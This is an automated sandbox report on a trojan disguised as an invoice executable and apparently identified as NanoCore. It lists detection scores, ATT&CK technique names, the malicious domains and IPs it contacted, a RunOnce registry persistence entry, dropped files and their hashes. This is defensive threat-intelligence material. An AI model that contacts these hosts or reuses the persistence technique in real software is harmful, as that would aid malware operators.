        External Remote Services | Scheduled Task | Startup Items | Startup Items | Virtualization/Sandbox Evasion 14 | DCSync | Remote System Discovery 1 | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact
        Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Access Token Manipulation 1 | Proc Filesystem | Network Service Scanning | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | | Generate Fraudulent Advertising Revenue
        Exploit Public-Facing Application | PowerShell | At (Linux) | At (Linux) | Process Injection 312 | /etc/passwd and /etc/shadow | System Network Connections Discovery | Software Deployment Tools | Data Staged | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | Web Protocols | Rogue Cellular Base Station | | Data Destruction

        Behavior Graph

        [Figure: behavior graph. Behavior Graph ID: 358392; Sample: CN-Invoice-XXXXX9808-190111...; Startdate: 25/02/2021; Architecture: WINDOWS; Score: 100]

        Antivirus, Machine Learning and Genetic Malware Detection

        Initial Sample

        Source | Detection | Scanner | Label
        CN-Invoice-XXXXX9808-19011143287994.exe | 30% | Virustotal |
        CN-Invoice-XXXXX9808-19011143287994.exe | 28% | ReversingLabs | ByteCode-MSIL.Trojan.Generic
        CN-Invoice-XXXXX9808-19011143287994.exe | 100% | Joe Sandbox ML |

        Dropped Files

        Source | Detection | Scanner | Label
        C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exe | 100% | Joe Sandbox ML |
        C:\Users\user\AppData\Local\Temp\5013165c-d39a-4f57-8b45-9c3615d2afd1\AdvancedRun.exe | 3% | Metadefender |
        C:\Users\user\AppData\Local\Temp\5013165c-d39a-4f57-8b45-9c3615d2afd1\AdvancedRun.exe | 0% | ReversingLabs |
        C:\Users\user\AppData\Local\Temp\ad6ba6ad-9e3d-4fc8-98d0-88a6e198c3b3\AdvancedRun.exe | 3% | Metadefender |
        C:\Users\user\AppData\Local\Temp\ad6ba6ad-9e3d-4fc8-98d0-88a6e198c3b3\AdvancedRun.exe | 0% | ReversingLabs |
        C:\Users\user\AppData\Local\Temp\e33cd0bd-fe57-408e-abef-c8ddfa8d2134\AdvancedRun.exe | 3% | Metadefender |
        C:\Users\user\AppData\Local\Temp\e33cd0bd-fe57-408e-abef-c8ddfa8d2134\AdvancedRun.exe | 0% | ReversingLabs |
        C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exe | 28% | ReversingLabs | ByteCode-MSIL.Trojan.Generic

        Unpacked PE Files

        Source | Detection | Scanner | Label
        13.2.CasPol.exe.51c0000.7.unpack | 100% | Avira | TR/NanoCore.fadte
        13.2.CasPol.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1108376

        Domains

        Source | Detection | Scanner | Label
        coroloboxorozor.com | 15% | Virustotal |

        URLs

        Source | Detection | Scanner | Label
        http://coroloboxorozor.com/base/7A885C86AF3E7CAEF5D9FC154830C30E.html | 0% | Avira URL Cloud | safe
        http://ocsp.sectigo.com0 | 0% | URL Reputation | safe
        http://pesterbdd.com/images/Pester.png | 0% | URL Reputation | safe
        http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s | 0% | URL Reputation | safe
        http://coroloboxorozor.com | 0% | Avira URL Cloud | safe
        http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0# | 0% | URL Reputation | safe
        http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t | 0% | URL Reputation | safe
        https://go.microd: | 0% | Avira URL Cloud | safe
        http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0# | 0% | URL Reputation | safe
        https://sectigo.com/CPS0C | 0% | URL Reputation | safe
        https://sectigo.com/CPS0D | 0% | URL Reputation | safe
        http://coroloboxorozor.com/base/F5B9A7CB87ADE6C09DC3687F02604706.html | 0% | Avira URL Cloud | safe
        http://coroloboxorozor.com/base/88756E9935B1A5EAEE811D9BDFD69574.html | 0% | Avira URL Cloud | safe
        http://crl.micr | 0% | Avira URL Cloud | safe

        Domains and IPs

        Contacted Domains

        Name | IP | Active | Malicious | Antivirus Detection | Reputation
        nanopc.linkpc.net | 157.97.120.21 | true | false | | high
        coroloboxorozor.com | 172.67.172.17 | true | true | | unknown

        Contacted URLs

        Name | Malicious | Antivirus Detection | Reputation
        http://coroloboxorozor.com/base/7A885C86AF3E7CAEF5D9FC154830C30E.html | true | Avira URL Cloud: safe | unknown
        http://coroloboxorozor.com/base/F5B9A7CB87ADE6C09DC3687F02604706.html | true | Avira URL Cloud: safe | unknown
        http://coroloboxorozor.com/base/88756E9935B1A5EAEE811D9BDFD69574.html | true | Avira URL Cloud: safe | unknown

        URLs from Memory and Binaries

        Name | Source | Malicious | Antivirus Detection | Reputation
        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dateofbirthrhttp://schemas.xmlsoap.org/ws/2005 | WerFault.exe, 00000011.00000003.754350493.0000000004DB0000.00000004.00000001.sdmp | false | | high
        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameidentifier | WerFault.exe, 00000011.00000003.754350493.0000000004DB0000.00000004.00000001.sdmp | false | | high
        http://ocsp.sectigo.com0 | CN-Invoice-XXXXX9808-19011143287994.exe, 00000000.00000002.925195088.00000000042BD000.00000004.00000001.sdmp, svchost.exe, 0000000C.00000002.955492913.00000000043C9000.00000004.00000001.sdmp, svchost.exe, 00000013.00000002.965974151.0000000006601000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
        http://pesterbdd.com/images/Pester.png | powershell.exe, 00000001.00000003.754942808.0000000009871000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
        http://schemas.xmlsoap.org/soap/encoding/ | powershell.exe, 00000005.00000002.940071314.000000000501F000.00000004.00000001.sdmp | false | | high
        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/emailaddressxhttp://schemas.xmlsoap.org/ws/200 | WerFault.exe, 00000011.00000003.754350493.0000000004DB0000.00000004.00000001.sdmp | false | | high
        http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 00000001.00000003.754942808.0000000009871000.00000004.00000001.sdmp | false | | high
        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/otherphone | WerFault.exe, 00000011.00000003.754350493.0000000004DB0000.00000004.00000001.sdmp | false | | high
        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/mobilephone | WerFault.exe, 00000011.00000003.754350493.0000000004DB0000.00000004.00000001.sdmp | false | | high
        http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s | CN-Invoice-XXXXX9808-19011143287994.exe, 00000000.00000002.925195088.00000000042BD000.00000004.00000001.sdmp, svchost.exe, 0000000C.00000002.955492913.00000000043C9000.00000004.00000001.sdmp, svchost.exe, 00000013.00000002.965974151.0000000006601000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/stateorprovince | WerFault.exe, 00000011.00000003.754350493.0000000004DB0000.00000004.00000001.sdmp | false | | high
        http://coroloboxorozor.com | CN-Invoice-XXXXX9808-19011143287994.exe, 00000000.00000002.857832068.0000000002EE1000.00000004.00000001.sdmp, svchost.exe, 0000000C.00000002.935499010.00000000031E1000.00000004.00000001.sdmp, svchost.exe, 00000013.00000002.934160270.0000000002921000.00000004.00000001.sdmp | true | Avira URL Cloud: safe | unknown
        http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0# | CN-Invoice-XXXXX9808-19011143287994.exe, 00000000.00000002.925195088.00000000042BD000.00000004.00000001.sdmp, svchost.exe, 0000000C.00000002.955492913.00000000043C9000.00000004.00000001.sdmp, svchost.exe, 00000013.00000002.965974151.0000000006601000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/streetaddresszhttp://schemas.xmlsoap.org/ws/20 | WerFault.exe, 00000011.00000003.754350493.0000000004DB0000.00000004.00000001.sdmp | false | | high
        https://github.com/Pester/Pester | powershell.exe, 00000001.00000003.754942808.0000000009871000.00000004.00000001.sdmp | false | | high
        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/postalcoderhttp://schemas.xmlsoap.org/ws/2005/ | WerFault.exe, 00000011.00000003.754350493.0000000004DB0000.00000004.00000001.sdmp | false | | high
        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/authentication | WerFault.exe, 00000011.00000003.754350493.0000000004DB0000.00000004.00000001.sdmp | false | | high
        http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t | CN-Invoice-XXXXX9808-19011143287994.exe, 00000000.00000002.925195088.00000000042BD000.00000004.00000001.sdmp, svchost.exe, 0000000C.00000002.955492913.00000000043C9000.00000004.00000001.sdmp, svchost.exe, 00000013.00000002.965974151.0000000006601000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/x500distinguishednamejhttp://schemas.xmlsoap.o | WerFault.exe, 00000011.00000003.754350493.0000000004DB0000.00000004.00000001.sdmp | false | | high
        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/denyonlysid | WerFault.exe, 00000011.00000003.754350493.0000000004DB0000.00000004.00000001.sdmp | false | | high
        https://go.microd: | powershell.exe, 00000001.00000003.748547781.0000000005A2C000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
                                      http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#CN-Invoice-XXXXX9808-19011143287994.exe, 00000000.00000002.925195088.00000000042BD000.00000004.00000001.sdmp, svchost.exe, 0000000C.00000002.955492913.00000000043C9000.00000004.00000001.sdmp, svchost.exe, 00000013.00000002.965974151.0000000006601000.00000004.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      unknown
                                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/authorizationdecisionzhttp://schemas.xmlsoap.oWerFault.exe, 00000011.00000003.754350493.0000000004DB0000.00000004.00000001.sdmpfalse
                                        high
                                        http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000005.00000002.940071314.000000000501F000.00000004.00000001.sdmpfalse
                                          high
                                          https://sectigo.com/CPS0CCN-Invoice-XXXXX9808-19011143287994.exe, 00000000.00000002.925195088.00000000042BD000.00000004.00000001.sdmp, svchost.exe, 0000000C.00000002.955492913.00000000043C9000.00000004.00000001.sdmp, svchost.exe, 00000013.00000002.965974151.0000000006601000.00000004.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          unknown
                                          https://sectigo.com/CPS0DCN-Invoice-XXXXX9808-19011143287994.exe, 00000000.00000002.925195088.00000000042BD000.00000004.00000001.sdmp, svchost.exe, 0000000C.00000002.955492913.00000000043C9000.00000004.00000001.sdmp, svchost.exe, 00000013.00000002.965974151.0000000006601000.00000004.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          unknown
                                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/thumbprintrhttp://schemas.xmlsoap.org/ws/2005/WerFault.exe, 00000011.00000003.754350493.0000000004DB0000.00000004.00000001.sdmpfalse
                                            high
                                            http://www.nirsoft.net/AdvancedRun.exe, AdvancedRun.exe, 00000004.00000002.684685331.000000000040C000.00000002.00020000.sdmp, svchost.exe, 0000000C.00000002.955492913.00000000043C9000.00000004.00000001.sdmp, svchost.exe, 00000013.00000002.965974151.0000000006601000.00000004.00000001.sdmpfalse
                                              high
                                              http://crl.micrpowershell.exe, 00000005.00000003.877512223.0000000009A1C000.00000004.00000001.sdmpfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameCN-Invoice-XXXXX9808-19011143287994.exe, 00000000.00000002.857832068.0000000002EE1000.00000004.00000001.sdmp, powershell.exe, 00000005.00000002.938217593.0000000004EE1000.00000004.00000001.sdmp, svchost.exe, 0000000C.00000002.935499010.00000000031E1000.00000004.00000001.sdmp, WerFault.exe, 00000011.00000003.754350493.0000000004DB0000.00000004.00000001.sdmp, svchost.exe, 00000013.00000002.934160270.0000000002921000.00000004.00000001.sdmpfalse
                                                high

                                                Contacted IPs

                                                Public

IP | Domain | Country | ASN | ASN Name | Malicious
157.97.120.21 | unknown | Netherlands | 201975 | UNISCAPEBIT-ServicesHostingNL | false
172.67.172.17 | unknown | United States | 13335 | CLOUDFLARENETUS | true
185.157.161.86 | unknown | Sweden | 197595 | OBE-EUROPEObenetworkEuropeSE | false

                                                Private

                                                IP
                                                192.168.2.1

                                                General Information

Joe Sandbox Version: 31.0.0 Emerald
Analysis ID: 358392
Start date: 25.02.2021
Start time: 15:09:08
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 17m 48s
Hypervisor based Inspection enabled: false
Report type: full
Sample file name: CN-Invoice-XXXXX9808-19011143287994.exe
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed: 33
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.troj.evad.winEXE@50/24@7/4
EGA Information: Failed
HDC Information:
• Successful, ratio: 100% (good quality ratio 95.8%)
• Quality average: 83%
• Quality standard deviation: 25.9%
HCA Information:
• Successful, ratio: 93%
• Number of executed functions: 123
• Number of non-executed functions: 171
Cookbook Comments:
• Adjust boot time
• Enable AMSI
• Found application associated with file extension: .exe
Warnings:
                                                • Exclude process from analysis (whitelisted): WmiPrvSE.exe
                                                • Excluded IPs from analysis (whitelisted): 52.147.198.201, 104.43.139.144, 104.42.151.234, 13.88.21.125, 104.43.193.48, 13.64.90.137, 8.248.143.254, 8.248.149.254, 8.248.117.254, 67.27.159.254, 8.253.207.121, 40.88.32.150
                                                • Excluded domains from analysis (whitelisted): skypedataprdcolwus17.cloudapp.net, ctldl.windowsupdate.com, skypedataprdcolcus16.cloudapp.net, skypedataprdcolcus15.cloudapp.net, skypedataprdcoleus16.cloudapp.net, skypedataprdcoleus15.cloudapp.net, blobcollector.events.data.trafficmanager.net, audownload.windowsupdate.nsatc.net, watson.telemetry.microsoft.com, auto.au.download.windowsupdate.com.c.footprint.net, skypedataprdcolwus16.cloudapp.net, skypedataprdcolwus15.cloudapp.net, au-bg-shim.trafficmanager.net
                                                • Report creation exceeded maximum time and may have missing behavior and disassembly information.
                                                • Report creation exceeded maximum time and may have missing disassembly code information.
                                                • Report size exceeded maximum capacity and may have missing behavior information.
                                                • Report size exceeded maximum capacity and may have missing disassembly code.
                                                • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                • Report size getting too big, too many NtQueryValueKey calls found.
                                                • Report size getting too big, too many NtSetInformationFile calls found.

                                                Simulations

                                                Behavior and APIs

Time | Type | Description
15:10:11 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce CecuQrfmvIJuvYmbY explorer.exe "C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exe"
15:10:20 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\RunOnce CecuQrfmvIJuvYmbY explorer.exe "C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exe"
15:10:35 | API Interceptor | 43x Sleep call for process: powershell.exe modified
15:11:14 | API Interceptor | 1x Sleep call for process: WerFault.exe modified

                                                Joe Sandbox View / Context

                                                IPs


                                                                      Domains


                                                                      ASN


                                                                      JA3 Fingerprints

                                                                      No context

                                                                      Dropped Files

Match: C:\Users\user\AppData\Local\Temp\5013165c-d39a-4f57-8b45-9c3615d2afd1\AdvancedRun.exe
Associated Sample Name / URL (Detection):
• PRODUCT SPECIFICATION.exe (malicious)
• DHL_document1102202068090891.exe (malicious)
• em6eElVbOm.exe (malicious)
• Purchase Order_Pdf.exe (malicious)
• Fireman.exe (malicious)
• NEW ORDER.exe (malicious)
• CN-Invoice-XXXXX9808-19011143287993.exe (malicious)
• payment confirmation 0029175112.exe (malicious)
• Vrxs6evJO7.exe (malicious)
• SecuriteInfo.com.Trojan.GenericKD.36380495.3131.exe (malicious)
• RMe2JcmlSh.exe (malicious)
• New Order 2300030317388 InterMetro.exe (malicious)
• CN-Invoice-XXXXX9808-19011143287989.exe (malicious)
• PURCHASE ITEMS.exe (malicious)
• CN-Invoice-XXXXX9808-19011143287992.exe (malicious)
• quotation_PR # 00459182..exe (malicious)
• PURCHASE ORDER CONFIRMATION.exe (malicious)
• New Order.exe (malicious)
• PO#87498746510.exe (malicious)
• TT.exe (malicious)

                                                                                                              Created / dropped Files

                                                                                                              C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_DICYYIQK30AZ1ATY_61d1cfef5cda9156e8bf5d3a5ef80772aa5bd7d_4c8b36b8_1802e6ce\Report.wer
                                                                                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                              File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):16870
                                                                                                              Entropy (8bit):3.7832288732112116
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:192:mzpqrjj/DmHBUZMXyzlaKsUO+CZFz/u7sAS274Itx09N:0pqrjjyBUZMXyzlaqqp/u7sAX4Itx09N
                                                                                                              MD5:7064487E63E3A4637297CCD632E63772
                                                                                                              SHA1:A6DCE963E361F60A0AA1F4E7ACC5EA7139606B8C
                                                                                                              SHA-256:F01915073C4D7743D8DB767606AC3720E757BA12BFEABB3CD82F2B17563652CD
                                                                                                              SHA-512:EE78B30ACA1603509CCC9ED8C47882CE5DBA7DC262C00F8344B16E3C60E7BF9599AFE73FFDEDCC24F3A67F34158441EEB61253201F3DFD3206515EB34699ED56
                                                                                                              Malicious:false
                                                                                                              C:\ProgramData\Microsoft\Windows\WER\Temp\WER5D4B.tmp.dmp
                                                                                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                              File Type:Mini DuMP crash report, 15 streams, Thu Feb 25 14:10:52 2021, 0x1205a4 type
                                                                                                              Category:dropped
                                                                                                              Size (bytes):315756
                                                                                                              Entropy (8bit):3.8109134708487242
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3072:FmIQyDfKoVveyn690bXjd+pxXAeYgIisW9gIOgF5TNbe0FUCgUBFD6:AIHTKgvO90bAp79RpDTFeSTj3e
                                                                                                              MD5:3F24F840B9869D223F418F51FDF47CE1
                                                                                                              SHA1:AF8472652BCE682B6E7C40F52970085B9CC09760
                                                                                                              SHA-256:72C7F9ED7BC6EA7DABD19108F7139DE3C2CBD01655952E74876D294854DE4ABC
                                                                                                              SHA-512:68F5FAE6D98A148ADFD411CA59D5D8CD675F34E70D5EC92D83CD73E03059174EECFE5FE3078D7DF04B0C46989A71B153F56119CE838671DC985EABAEC63BF11C
                                                                                                              Malicious:false
                                                                                                              C:\ProgramData\Microsoft\Windows\WER\Temp\WER9E2E.tmp.WERInternalMetadata.xml
                                                                                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                              File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):8494
                                                                                                              Entropy (8bit):3.710666372851257
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:192:Rrl7r3GLNiKeD60V6Yr/SU+N5mTKTPgmfZoS/+pry89bZ6sf3xzm:RrlsNiKC6m6YTSU+N5mObgmfSSAZZf3o
                                                                                                              MD5:5791974E34FF7956C4D230782FB8F5A6
                                                                                                              SHA1:FAD63F7331FE93C1139385D36564AA23636F297D
                                                                                                              SHA-256:DF2F547053D6C1D141602D01960B93BA93B65B78AC1324345BFEFFC4D2F9CE36
                                                                                                              SHA-512:2BE303A58ED70D8DC700B87D52D30391277D9A8B0A147AC2F6DA53A02BADD73501700F4F049724BDC18D42E88B051D960408B23AF82C07FBE368EE45F5A6825C
                                                                                                              Malicious:false
                                                                                                              C:\ProgramData\Microsoft\Windows\WER\Temp\WERA68B.tmp.xml
                                                                                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):4800
                                                                                                              Entropy (8bit):4.567228996532901
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:48:cvIwSD8zs1tJgtWI9rKkWSC8Bvs8fm8M4Jeh/FFht+q8vFh//KA71zd:uITf1HcKSNxRJu5tKrHKA71zd
                                                                                                              MD5:50E2A91F31E670B3054F60A2D52F8528
                                                                                                              SHA1:6782321474333481C3B34B19D02AA6040FAAE43F
                                                                                                              SHA-256:C7B28C9B73B1C111AA04D79D2544CBDF75DD194D61CC392EBEAD7A5120174720
                                                                                                              SHA-512:47FCD52CFD76B663B9A066BD35DF9525B0865A3EFB8EC71FDA0A773EACC80C37D88BDCBC3866FB580903F20DDBCACF44EC8534C01A5B6A7867085BA5CB81E8E5
                                                                                                              Malicious:false
                                                                                                              C:\ProgramData\Microsoft\Windows\WER\Temp\WERA6E7.tmp.csv
                                                                                                              Process:C:\Windows\System32\svchost.exe
                                                                                                              File Type:data
                                                                                                              Category:dropped
                                                                                                              Size (bytes):56208
                                                                                                              Entropy (8bit):3.0530640921878747
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:1536:aDHQeMGIvhCOc9+sA3BCrbKpO+f03hfvc:aDHQeMGIvhCOc9+sA3BCrbKpO+f035vc
                                                                                                              MD5:70B4C3FFC96DD244F3772D6F81B0783C
                                                                                                              SHA1:4B086568DF91ADEA95A354B0BBC745950A51AFFA
                                                                                                              SHA-256:71FAE19F2A3FC6FF96106AD7D829A3D5BE55A3FA06EFA8FEA77E3239E076632A
                                                                                                              SHA-512:7CD460FF3279077C2F22B09676127371D924046A7AF82850FCC9C5F20EBDB378E1BF7C3DA0DD08D08B3257C8300C17355D64E86474F91F4C1037B9A14E8AC24F
                                                                                                              Malicious:false
                                                                                                              C:\ProgramData\Microsoft\Windows\WER\Temp\WERACC4.tmp.txt
                                                                                                              Process:C:\Windows\System32\svchost.exe
                                                                                                              File Type:data
                                                                                                              Category:dropped
                                                                                                              Size (bytes):13340
                                                                                                              Entropy (8bit):2.6955683935498898
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:96:9GiZYW+TUve8IYHYcb4WgHNYEZhgst2iG9zEXwtIxraKhaAJiOnIS53:9jZD+HQzbQPNaKhaAcZS53
                                                                                                              MD5:9E8DFC94FEF322FE02E9F7E48376894A
                                                                                                              SHA1:12BD9CA05D34330269DA55CC174B9020A91BC5B0
                                                                                                              SHA-256:A81606A41BE21D9687FD67C1FF81BFF367F0F5E6BA228EB72B0E4F404EA72FEB
                                                                                                              SHA-512:6EC0936F401B10A335253BC3FAFE9D710CE8CC3E0DA95E0141C062989BD85E00CC9AFE0EF1CB2512316433F918C1C573C8DDF98DAB5722A1DBA17473484FF392
                                                                                                              Malicious:false
                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              File Type:data
                                                                                                              Category:dropped
                                                                                                              Size (bytes):14734
                                                                                                              Entropy (8bit):4.996142136926143
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:384:SEdVoGIpN6KQkj2Zkjh4iUxZvuiOOdBCNXp5nYoJib4J:SYV3IpNBQkj2Yh4iUxZvuiOOdBCNZlYO
                                                                                                              MD5:B7D3A4EB1F0AED131A6E0EDF1D3C0414
                                                                                                              SHA1:A72E0DDE5F3083632B7242D2407658BCA3E54F29
                                                                                                              SHA-256:8E0EB5898DDF86FE9FE0011DD7AC6711BB0639A8707053D831FB348F9658289B
                                                                                                              SHA-512:F9367BBEC9A44E5C08757576C56B9C8637D8A0A9D6220DE925255888E6A0A088C653E207E211A6796F6A7F469736D538EA5B9E094944316CF4E8189DDD3EED9D
                                                                                                              Malicious:false
                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              File Type:data
                                                                                                              Category:dropped
                                                                                                              Size (bytes):21664
                                                                                                              Entropy (8bit):5.600013791978551
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:384:/tL68qUkj8c5Eh2MQX+Rw4KnKultIqspE9mw7AhBmzq5vxHV03fjj2DI++jp:uj8cSh2Z4KKultAV3qqtibcc
                                                                                                              MD5:250E88BCD42F9C0B7EEB5173BE816D5B
                                                                                                              SHA1:5A1053254E192BE05F99BBC0F0A8ACD7550CC11B
                                                                                                              SHA-256:E0351D82E30A3C884B6950D68A1B7A3F1994B12E48488AF55E6E589FDEBB8D95
                                                                                                              SHA-512:0E4133E4B8B7C1770EA241FECFA883DAC49EA6BF167D8784ADC4F83CA75F7B8415A088DA102BFEAF0824428978346D69A60F99FCBAFDE001B12247C768730E55
                                                                                                              Malicious:false
                                                                                                              C:\Users\user\AppData\Local\Temp\5013165c-d39a-4f57-8b45-9c3615d2afd1\AdvancedRun.exe
                                                                                                              Process:C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exe
                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                              Category:dropped
                                                                                                              Size (bytes):91000
                                                                                                              Entropy (8bit):6.241345766746317
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:1536:JW3osrWjET3tYIrrRepnbZ6ObGk2nLY2jR+utQUN+WXim:HjjET9nX0pnUOik2nXjR+utQK+g3
                                                                                                              MD5:17FC12902F4769AF3A9271EB4E2DACCE
                                                                                                              SHA1:9A4A1581CC3971579574F837E110F3BD6D529DAB
                                                                                                              SHA-256:29AE7B30ED8394C509C561F6117EA671EC412DA50D435099756BBB257FAFB10B
                                                                                                              SHA-512:036E0D62490C26DEE27EF54E514302E1CC8A14DE8CE3B9703BF7CAF79CFAE237E442C27A0EDCF2C4FD41AF4195BA9ED7E32E894767CE04467E79110E89522E4A
                                                                                                              Malicious:false
                                                                                                              Antivirus:
                                                                                                              • Antivirus: Metadefender, Detection: 3%
                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                              Joe Sandbox View:
                                                                                                              • Filename: PRODUCT SPECIFICATION.exe, Detection: malicious
                                                                                                              • Filename: DHL_document1102202068090891.exe, Detection: malicious
                                                                                                              • Filename: em6eElVbOm.exe, Detection: malicious
                                                                                                              • Filename: Purchase Order_Pdf.exe, Detection: malicious
                                                                                                              • Filename: Fireman.exe, Detection: malicious
                                                                                                              • Filename: NEW ORDER.exe, Detection: malicious
                                                                                                              • Filename: CN-Invoice-XXXXX9808-19011143287993.exe, Detection: malicious
                                                                                                              • Filename: payment confirmation 0029175112.exe, Detection: malicious
                                                                                                              • Filename: Vrxs6evJO7.exe, Detection: malicious
                                                                                                              • Filename: SecuriteInfo.com.Trojan.GenericKD.36380495.3131.exe, Detection: malicious
                                                                                                              • Filename: RMe2JcmlSh.exe, Detection: malicious
                                                                                                              • Filename: New Order 2300030317388 InterMetro.exe, Detection: malicious
                                                                                                              • Filename: CN-Invoice-XXXXX9808-19011143287989.exe, Detection: malicious
                                                                                                              • Filename: PURCHASE ITEMS.exe, Detection: malicious
                                                                                                              • Filename: CN-Invoice-XXXXX9808-19011143287992.exe, Detection: malicious
                                                                                                              • Filename: quotation_PR # 00459182..exe, Detection: malicious
                                                                                                              • Filename: PURCHASE ORDER CONFIRMATION.exe, Detection: malicious
                                                                                                              • Filename: New Order.exe, Detection: malicious
                                                                                                              • Filename: PO#87498746510.exe, Detection: malicious
                                                                                                              • Filename: TT.exe, Detection: malicious
                                                                                                              C:\Users\user\AppData\Local\Temp\5013165c-d39a-4f57-8b45-9c3615d2afd1\test.bat
                                                                                                              Process:C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exe
                                                                                                              File Type:ASCII text, with very long lines, with CRLF line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):8399
                                                                                                              Entropy (8bit):4.665734428420432
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:192:XjtIefE/Qv3puaQo8BElNisgwgxOTkre0P/XApNDQSO8wQJYbZhgEAFcH8N:xIef2Qh8BuNivdisOyj6YboVF3N
                                                                                                              MD5:B2A5EF7D334BDF866113C6F4F9036AAE
                                                                                                              SHA1:F9027F2827B35840487EFD04E818121B5A8541E0
                                                                                                              SHA-256:27426AA52448E564B5B9DFF2DBE62037992ADA8336A8E36560CEE7A94930C45E
                                                                                                              SHA-512:8ED39ED39E03FA6D4E49167E8CA4823E47A221294945C141B241CFD1EB7D20314A15608DA3FAFC3C258AE2CFC535D3E5925B56CACEEE87ACFB7D4831D267189E
                                                                                                              Malicious:false
